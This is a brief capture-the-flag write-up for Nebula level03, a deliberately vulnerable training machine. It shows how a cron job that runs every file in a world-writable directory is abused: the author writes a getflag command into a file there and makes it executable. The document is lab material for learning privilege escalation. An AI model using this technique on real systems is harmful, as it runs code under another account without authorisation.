Exploit Exercises Nebula 5: Level 03 Write Up
Level: https://exploit-exercises.com/nebula/level03/
Check the home directory of flag03 and take note of the files there.
There is a crontab that is called every couple of minutes.
To do this level, log in as the level03 account with the password level03. Files for this level can be found in /home/flag03.
ls -la /home/flag03
writeable.sh
executes bash -x
for every file in writeable.d
writeable.d
is world writeable so place our own file.
echo "getflag > /home/flag03/flag" > /home/flag03/writeable.d/test
chmod +x /home/flag03/writeable.d/test
Wait for a bit than run cat /home/flag03/flag
to make sure getflag
ran.
You have successfully executed getflag on a target account.